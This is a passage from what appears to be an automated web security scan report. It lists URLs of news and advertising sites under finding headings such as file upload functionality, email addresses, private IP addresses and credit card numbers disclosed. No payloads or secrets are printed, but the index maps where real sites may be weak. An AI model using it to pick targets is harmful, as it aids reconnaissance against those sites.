18.712. http://www.bostonherald.com/projects/payroll/quasi_state/

18.713. http://www.bostonherald.com/projects/payroll/quincy/

18.714. http://www.bostonherald.com/projects/payroll/springfield/

18.715. http://www.bostonherald.com/projects/payroll/suffolk/

18.716. http://www.bostonherald.com/projects/payroll/worcester/

18.717. http://www.bostonherald.com/projects/your_tax_dollars.bg

18.718. http://www.bostonherald.com/search/

18.719. http://www.bostonherald.com/shopping/half_price_boston/

18.720. http://www.bostonherald.com/sports/

18.721. http://www.bostonherald.com/sports/baseball/

18.722. http://www.bostonherald.com/sports/basketball/

18.723. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

18.724. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

18.725. http://www.bostonherald.com/sports/college/

18.726. http://www.bostonherald.com/sports/columnists/

18.727. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

18.728. http://www.bostonherald.com/sports/football/

18.729. http://www.bostonherald.com/sports/football/patriot_moments/

18.730. http://www.bostonherald.com/sports/football/patriots/view.bg

18.731. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

18.732. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

18.733. http://www.bostonherald.com/sports/golf/

18.734. http://www.bostonherald.com/sports/hockey/

18.735. http://www.bostonherald.com/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also

18.736. http://www.bostonherald.com/sports/other_sports/

18.737. http://www.bostonherald.com/sports/soccer/

18.738. http://www.bostonherald.com/store/

18.739. http://www.bostonherald.com/track/

18.740. http://www.bostonherald.com/track/celebrity/

18.741. http://www.bostonherald.com/track/celebrity/view.bg

18.742. http://www.bostonherald.com/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also

18.743. http://www.bostonherald.com/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also

18.744. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

18.745. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also

18.746. http://www.bostonherald.com/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also

18.747. http://www.bostonherald.com/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet

18.748. http://www.bostonherald.com/track/inside_track/

18.749. http://www.bostonherald.com/track/inside_track/view.bg

18.750. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

18.751. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also

18.752. http://www.bostonherald.com/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also

18.753. http://www.bostonherald.com/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also

18.754. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

18.755. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

18.756. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

18.757. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also

18.758. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also

18.759. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

18.760. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3

18.761. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

18.762. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

18.763. http://www.bostonherald.com/track/star_tracks/

18.764. http://www.bostonherald.com/track/star_tracks/view.bg

18.765. http://www.bostonherald.com/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also

18.766. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also

18.767. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet

18.768. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also

18.769. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet

18.770. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also

18.771. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

18.772. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

18.773. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also

18.774. http://www.bostonherald.com/track/track_gals_tv/

18.775. http://www.bostonherald.com/users/register

18.776. http://www.bostonherald.com/users/register/

18.777. http://www.bostonherald.com/weather/

18.778. http://www.cbs6albany.com/

18.779. http://www.cbs6albany.com/albany-community/

18.780. http://www.cbs6albany.com/albany-tv-programming/

18.781. http://www.cbs6albany.com/albany-weather-forecast

18.782. http://www.cbs6albany.com/common/archives/

18.783. http://www.cbs6albany.com/common/archives/

18.784. http://www.cbs6albany.com/common/archives/

18.785. http://www.cbs6albany.com/search/

18.786. http://www.cbs6albany.com/sections/abouthdtv/

18.787. http://www.cbs6albany.com/sections/articles-map/

18.788. http://www.cbs6albany.com/sections/contactus/

18.789. http://www.cbs6albany.com/sections/contactus/newstips/

18.790. http://www.cbs6albany.com/sections/employmentopportunities/

18.791. http://www.cbs6albany.com/sections/jobsonline/

18.792. http://www.cbs6albany.com/sections/live-cameras/

18.793. http://www.cbs6albany.com/sections/local-news/

18.794. http://www.cbs6albany.com/sections/local-sports/

18.795. http://www.cbs6albany.com/sections/production-department/

18.796. http://www.cbs6albany.com/sections/publicfile/

18.797. http://www.cbs6albany.com/sections/rss/

18.798. http://www.cbs6albany.com/sections/sales/

18.799. http://www.cbs6albany.com/sections/satellitewaivers/

18.800. http://www.cbs6albany.com/sections/schoolclosures/

18.801. http://www.cbs6albany.com/sections/schoolwatch/

18.802. http://www.cbs6albany.com/sections/sitemap/

18.803. http://www.cbs6albany.com/sections/sp-alerts/

18.804. http://www.cbs6albany.com/sections/thirdParty/iframe_footer/

18.805. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

18.806. http://www.cbs6albany.com/sections/traffic-events/

18.807. http://www.cbs6albany.com/sections/traffic/

18.808. http://www.cbs6albany.com/sections/tvlistings/

18.809. http://www.cbs6albany.com/sections/videocopies/

18.810. http://www.cbs6albany.com/sections/weather/7day/

18.811. http://www.cbs6albany.com/sections/web-links/

18.812. http://www.cbs6albany.com/sections/wrgb-talent/

18.813. http://www.cbs6albany.com/sections/you-paid-for-it/

18.814. http://www.collegeanduniversity.net/herald/

18.815. http://www.moxiesoft.com/

18.816. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

18.817. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

18.818. http://www.moxiesoft.com/tal_about/contact.aspx

18.819. http://www.moxiesoft.com/tal_news/press_release.aspx

18.820. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

18.821. http://www.moxiesoft.com/tal_products/answer.aspx

18.822. http://www.moxiesoft.com/tal_products/chat.aspx

18.823. http://www.moxiesoft.com/tal_products/cobrowse.aspx

18.824. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

18.825. http://www.moxiesoft.com/tal_products/email.aspx

18.826. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

18.827. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

18.828. http://www.moxiesoft.com/tal_products/phone.aspx

18.829. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

18.830. http://www.moxiesoft.com/tal_products/request_demo.aspx

18.831. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

18.832. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

18.833. http://www.paperg.com/

18.834. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html

18.835. https://www.paperg.com/post.php

18.836. http://www.parker-software.com/forum/

18.837. http://www.parkersoft.co.uk/

18.838. http://www.parkersoft.co.uk/about.aspx

18.839. http://www.parkersoft.co.uk/client.aspx

18.840. http://www.parkersoft.co.uk/contact.aspx

18.841. http://www.parkersoft.co.uk/email2db.aspx

18.842. http://www.parkersoft.co.uk/partners.aspx

18.843. http://www.parkersoft.co.uk/privacy.aspx

18.844. http://www.parkersoft.co.uk/products.aspx

18.845. http://www.parkersoft.co.uk/smsserver.aspx

18.846. http://www.parkersoft.co.uk/subscribe.aspx

18.847. http://www.parkersoft.co.uk/supnotes.aspx

18.848. http://www.parkersoft.co.uk/terms.aspx

18.849. http://www.parkersoft.co.uk/whoson.aspx

18.850. http://www.quantcast.com/p-352ZWwG8I7OVQ

18.851. http://www.soundingsonline.com/

18.852. http://www.soundingsonline.com/about-us

18.853. http://www.soundingsonline.com/advertise

18.854. http://www.soundingsonline.com/archives

18.855. http://www.soundingsonline.com/boat-shop

18.856. http://www.soundingsonline.com/boat-shop/know-how

18.857. http://www.soundingsonline.com/boat-shop/new-boats

18.858. http://www.soundingsonline.com/boat-shop/new-gear

18.859. http://www.soundingsonline.com/boat-shop/on-powerboats

18.860. http://www.soundingsonline.com/boat-shop/on-sailboats

18.861. http://www.soundingsonline.com/boat-shop/q-a-a

18.862. http://www.soundingsonline.com/boat-shop/sea-savvy

18.863. http://www.soundingsonline.com/boat-shop/tech-talk

18.864. http://www.soundingsonline.com/boat-shop/used-boat-review

18.865. http://www.soundingsonline.com/calendar

18.866. http://www.soundingsonline.com/career-opportunities

18.867. http://www.soundingsonline.com/columns-blogs

18.868. http://www.soundingsonline.com/columns-blogs/bay-tripper

18.869. http://www.soundingsonline.com/columns-blogs/books

18.870. http://www.soundingsonline.com/columns-blogs/new-england-fishing

18.871. http://www.soundingsonline.com/columns-blogs/under-way

18.872. http://www.soundingsonline.com/component/chronocontact/

18.873. http://www.soundingsonline.com/component/content/article/237622

18.874. http://www.soundingsonline.com/component/yvcomment/

18.875. http://www.soundingsonline.com/contact-us

18.876. http://www.soundingsonline.com/features

18.877. http://www.soundingsonline.com/features/destinations

18.878. http://www.soundingsonline.com/features/in-depth

18.879. http://www.soundingsonline.com/features/justyesterday

18.880. http://www.soundingsonline.com/features/lifestyle

18.881. http://www.soundingsonline.com/features/profiles

18.882. http://www.soundingsonline.com/features/technical

18.883. http://www.soundingsonline.com/features/type-of-boat

18.884. http://www.soundingsonline.com/index.php

18.885. http://www.soundingsonline.com/more/digital-publications

18.886. http://www.soundingsonline.com/more/the-masters-series

18.887. http://www.soundingsonline.com/news

18.888. http://www.soundingsonline.com/news/coastwise

18.889. http://www.soundingsonline.com/news/dispatches

18.890. http://www.soundingsonline.com/news/home-waters

18.891. http://www.soundingsonline.com/news/mishaps-a-rescues

18.892. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

18.893. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

18.894. http://www.soundingsonline.com/news/sailing

18.895. http://www.soundingsonline.com/news/todays-top-stories

18.896. http://www.soundingsonline.com/resources

18.897. http://www.soundingsonline.com/site-map

18.898. http://www.soundingsonline.com/subscription-services

18.899. http://www.soundingsonline.com/subscription-services/preview-current-issue

18.900. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

18.901. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

18.902. http://www.zvents.com/

18.903. http://www.zvents.com/albany-ny/events

19. File upload functionality

19.1. http://www.bostonherald.com/about/contact/news_tip.bg

19.2. http://www.bostonherald.com/sports/football/patriot_moments/

20. Database connection string disclosed

21. Email addresses disclosed

21.1. http://assets.nydailynews.com/js/nydn-pack-20101001.js

21.2. http://boston30.autochooser.com/results.asp

21.3. http://bostonherald.com/blogs/entertainment/the_assistant/

21.4. http://bostonherald.com/blogs/lifestyle/fork_lift/

21.5. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

21.6. http://bostonherald.com/projects/your_tax_dollars.bg

21.7. http://bostonherald.com/projects/your_tax_dollars.bg

21.8. http://bostonherald.com/sports/football/patriots/view.bg

21.9. http://bostonherald.com/track/inside_track/view.bg

21.10. http://events.cbs6albany.com/javascripts/s_code.js

21.11. http://events.cbs6albany.com/opensearch/description150.xml

21.12. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

21.13. http://hosted.ap.org/static/js/prototype.js

21.14. http://jqueryui.com/about

21.15. http://support.moxiesoft.com/

21.16. http://twitter.com/LibertyHotel

21.17. http://twitter.com/ShaunieONeal

21.18. http://twitter.com/about/contact

21.19. http://twitter.com/favorites/toptweets.json

21.20. http://twitter.com/j_hollender

21.21. http://twitter.com/javascripts/widgets/widget.js

21.22. http://twitter.com/rachbarnhart

21.23. http://www.berkshireeagle.com/

21.24. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.25. http://www.bostonherald.com/about/contact/

21.26. http://www.bostonherald.com/about/home_delivery/

21.27. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

21.28. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

21.29. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

21.30. http://www.bostonherald.com/blogs/news/on_the_t/

21.31. http://www.bostonherald.com/business/general/view.bg

21.32. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

21.33. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

21.34. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

21.35. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

21.36. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

21.37. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

21.38. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

21.39. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

21.40. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

21.41. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

21.42. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

21.43. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

21.44. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

21.45. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

21.46. http://www.bostonherald.com/mediacenter/

21.47. http://www.bostonherald.com/mediacenter/index.php

21.48. http://www.bostonherald.com/news/opinion/

21.49. http://www.bostonherald.com/news/politics/view.bg

21.50. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

21.51. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

21.52. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

21.53. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

21.54. http://www.bostonherald.com/news/regional/gardner_heist/

21.55. http://www.bostonherald.com/news/regional/view.bg

21.56. http://www.bostonherald.com/news/regional/view.bg

21.57. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

21.58. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

21.59. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

21.60. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

21.61. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

21.62. http://www.bostonherald.com/projects/boston_pensions/

21.63. http://www.bostonherald.com/projects/bra/

21.64. http://www.bostonherald.com/projects/buybacks/

21.65. http://www.bostonherald.com/projects/consultants/

21.66. http://www.bostonherald.com/projects/edic/

21.67. http://www.bostonherald.com/projects/lawyer_pay/

21.68. http://www.bostonherald.com/projects/mta2008/

21.69. http://www.bostonherald.com/projects/payroll/brockton/

21.70. http://www.bostonherald.com/projects/payroll/cambridge/

21.71. http://www.bostonherald.com/projects/payroll/cca/

21.72. http://www.bostonherald.com/projects/payroll/mass_pike/

21.73. http://www.bostonherald.com/projects/payroll/quasi_state/

21.74. http://www.bostonherald.com/projects/payroll/quincy/

21.75. http://www.bostonherald.com/projects/payroll/springfield/

21.76. http://www.bostonherald.com/projects/payroll/suffolk/

21.77. http://www.bostonherald.com/projects/payroll/worcester/

21.78. http://www.bostonherald.com/projects/your_tax_dollars.bg

21.79. http://www.bostonherald.com/projects/your_tax_dollars.bg

21.80. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

21.81. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

21.82. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

21.83. http://www.bostonherald.com/sports/football/patriots/view.bg

21.84. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

21.85. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

21.86. http://www.bostonherald.com/store/

21.87. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

21.88. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

21.89. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

21.90. http://www.cbs6albany.com/

21.91. http://www.cbs6albany.com/albany-community/

21.92. http://www.cbs6albany.com/albany-tv-programming/

21.93. http://www.cbs6albany.com/albany-weather-forecast

21.94. http://www.cbs6albany.com/common/archives/

21.95. http://www.cbs6albany.com/common/tools/load.php

21.96. http://www.cbs6albany.com/search/

21.97. http://www.cbs6albany.com/sections/abouthdtv/

21.98. http://www.cbs6albany.com/sections/articles-map/

21.99. http://www.cbs6albany.com/sections/contactus/

21.100. http://www.cbs6albany.com/sections/contactus/newstips/

21.101. http://www.cbs6albany.com/sections/employmentopportunities/

21.102. http://www.cbs6albany.com/sections/jobsonline/

21.103. http://www.cbs6albany.com/sections/live-cameras/

21.104. http://www.cbs6albany.com/sections/local-news/

21.105. http://www.cbs6albany.com/sections/local-sports/

21.106. http://www.cbs6albany.com/sections/production-department/

21.107. http://www.cbs6albany.com/sections/publicfile/

21.108. http://www.cbs6albany.com/sections/rss/

21.109. http://www.cbs6albany.com/sections/sales/

21.110. http://www.cbs6albany.com/sections/satellitewaivers/

21.111. http://www.cbs6albany.com/sections/schoolclosures/

21.112. http://www.cbs6albany.com/sections/schoolwatch/

21.113. http://www.cbs6albany.com/sections/sitemap/

21.114. http://www.cbs6albany.com/sections/sp-alerts/

21.115. http://www.cbs6albany.com/sections/traffic-events/

21.116. http://www.cbs6albany.com/sections/traffic/

21.117. http://www.cbs6albany.com/sections/tvlistings/

21.118. http://www.cbs6albany.com/sections/videocopies/

21.119. http://www.cbs6albany.com/sections/weather/7day/

21.120. http://www.cbs6albany.com/sections/web-links/

21.121. http://www.cbs6albany.com/sections/wrgb-talent/

21.122. http://www.cbs6albany.com/sections/you-paid-for-it/

21.123. http://www.dominionenterprises.com/main/do/Privacy_Policy

21.124. http://www.dominionenterprises.com/main/do/Terms_of_Use

21.125. http://www.moxiesoft.com/

21.126. http://www.moxiesoft.com/search.aspx

21.127. http://www.moxiesoft.com/sitemap.aspx

21.128. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

21.129. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

21.130. http://www.moxiesoft.com/solutions/spaces-solutions.aspx

21.131. http://www.moxiesoft.com/tal_about/aboutus.aspx

21.132. http://www.moxiesoft.com/tal_about/careers.aspx

21.133. http://www.moxiesoft.com/tal_about/contact.aspx

21.134. http://www.moxiesoft.com/tal_about/default.aspx

21.135. http://www.moxiesoft.com/tal_about/directors.aspx

21.136. http://www.moxiesoft.com/tal_about/legal.aspx

21.137. http://www.moxiesoft.com/tal_about/management.aspx

21.138. http://www.moxiesoft.com/tal_about/partners/default.aspx

21.139. http://www.moxiesoft.com/tal_about/terms-of-use.aspx

21.140. http://www.moxiesoft.com/tal_lp/campaign.aspx

21.141. http://www.moxiesoft.com/tal_lp/default.aspx

21.142. http://www.moxiesoft.com/tal_news/awards.aspx

21.143. http://www.moxiesoft.com/tal_news/customers.aspx

21.144. http://www.moxiesoft.com/tal_news/events-resources.aspx

21.145. http://www.moxiesoft.com/tal_news/press_release.aspx

21.146. http://www.moxiesoft.com/tal_news/press_release.aspx

21.147. http://www.moxiesoft.com/tal_news/press_room.aspx

21.148. http://www.moxiesoft.com/tal_news/webinars/default.aspx

21.149. http://www.moxiesoft.com/tal_news/webinars_events.aspx

21.150. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

21.151. http://www.moxiesoft.com/tal_products/answer.aspx

21.152. http://www.moxiesoft.com/tal_products/chat.aspx

21.153. http://www.moxiesoft.com/tal_products/chat_benefits.aspx

21.154. http://www.moxiesoft.com/tal_products/chat_tour.aspx

21.155. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

21.156. http://www.moxiesoft.com/tal_products/clicktocall.aspx

21.157. http://www.moxiesoft.com/tal_products/cobrowse.aspx

21.158. http://www.moxiesoft.com/tal_products/collaboration.aspx

21.159. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

21.160. http://www.moxiesoft.com/tal_products/email.aspx

21.161. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

21.162. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

21.163. http://www.moxiesoft.com/tal_products/phone.aspx

21.164. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

21.165. http://www.moxiesoft.com/tal_products/proactivechatdemo/

21.166. http://www.moxiesoft.com/tal_products/products.aspx

21.167. http://www.moxiesoft.com/tal_products/request_demo.aspx

21.168. http://www.moxiesoft.com/tal_products/request_quote.aspx

21.169. http://www.moxiesoft.com/tal_products/social-media.aspx

21.170. http://www.moxiesoft.com/tal_resources/content.aspx

21.171. http://www.moxiesoft.com/tal_resources/resource_center.aspx

21.172. http://www.moxiesoft.com/tal_services/advisory-services.aspx

21.173. http://www.moxiesoft.com/tal_services/hosting.aspx

21.174. http://www.moxiesoft.com/tal_services/implementation.aspx

21.175. http://www.moxiesoft.com/tal_services/services.aspx

21.176. http://www.moxiesoft.com/tal_services/training.aspx

21.177. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

21.178. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

21.179. https://www.paperg.com/post.php

21.180. http://www.soundingsonline.com/

21.181. http://www.soundingsonline.com/about-us

21.182. http://www.soundingsonline.com/advertise

21.183. http://www.soundingsonline.com/archives

21.184. http://www.soundingsonline.com/boat-shop

21.185. http://www.soundingsonline.com/boat-shop/know-how

21.186. http://www.soundingsonline.com/boat-shop/new-boats

21.187. http://www.soundingsonline.com/boat-shop/new-gear

21.188. http://www.soundingsonline.com/boat-shop/on-powerboats

21.189. http://www.soundingsonline.com/boat-shop/on-sailboats

21.190. http://www.soundingsonline.com/boat-shop/q-a-a

21.191. http://www.soundingsonline.com/boat-shop/sea-savvy

21.192. http://www.soundingsonline.com/boat-shop/tech-talk

21.193. http://www.soundingsonline.com/boat-shop/used-boat-review

21.194. http://www.soundingsonline.com/calendar

21.195. http://www.soundingsonline.com/career-opportunities

21.196. http://www.soundingsonline.com/columns-blogs

21.197. http://www.soundingsonline.com/columns-blogs/bay-tripper

21.198. http://www.soundingsonline.com/columns-blogs/books

21.199. http://www.soundingsonline.com/columns-blogs/new-england-fishing

21.200. http://www.soundingsonline.com/columns-blogs/under-way

21.201. http://www.soundingsonline.com/component/chronocontact/

21.202. http://www.soundingsonline.com/component/content/article/237622

21.203. http://www.soundingsonline.com/component/yvcomment/

21.204. http://www.soundingsonline.com/contact-us

21.205. http://www.soundingsonline.com/features

21.206. http://www.soundingsonline.com/features/destinations

21.207. http://www.soundingsonline.com/features/in-depth

21.208. http://www.soundingsonline.com/features/justyesterday

21.209. http://www.soundingsonline.com/features/lifestyle

21.210. http://www.soundingsonline.com/features/profiles

21.211. http://www.soundingsonline.com/features/technical

21.212. http://www.soundingsonline.com/features/type-of-boat

21.213. http://www.soundingsonline.com/index.php

21.214. http://www.soundingsonline.com/more/digital-publications

21.215. http://www.soundingsonline.com/more/the-masters-series

21.216. http://www.soundingsonline.com/news

21.217. http://www.soundingsonline.com/news/coastwise

21.218. http://www.soundingsonline.com/news/dispatches

21.219. http://www.soundingsonline.com/news/home-waters

21.220. http://www.soundingsonline.com/news/mishaps-a-rescues

21.221. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

21.222. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

21.223. http://www.soundingsonline.com/news/sailing

21.224. http://www.soundingsonline.com/news/todays-top-stories

21.225. http://www.soundingsonline.com/resources

21.226. http://www.soundingsonline.com/s_code.js

21.227. http://www.soundingsonline.com/site-map

21.228. http://www.soundingsonline.com/subscription-services

21.229. http://www.soundingsonline.com/subscription-services/preview-current-issue

21.230. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

21.231. http://www.zvents.com/javascripts/s_code.js

22. Private IP addresses disclosed

22.1. http://digg.com/submit

22.2. http://digg.com/submit

23. Credit card numbers disclosed

23.1. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

23.2. http://local.nissanusa.com/louisville-area

23.3. http://local.nissanusa.com/miami-area

23.4. http://local.nissanusa.com/nashville-area

23.5. http://local.nissanusa.com/new-york-area

23.6. http://local.nissanusa.com/sacramento-area

24. Robots.txt file

24.1. http://ad.afy11.net/ad

24.2. https://tt3.zedo.com/

25. Cacheable HTTPS response

26. Multiple content types specified

26.1. http://base.liveperson.net/visitor/addons/deploy.asp

26.2. https://base.liveperson.net/hcp/html/chatConnLib.js

26.3. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

27. HTML does not specify charset

27.1. http://a.tribalfusion.com/favicon.ico

27.2. http://a.tribalfusion.com/j.ad

27.3. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

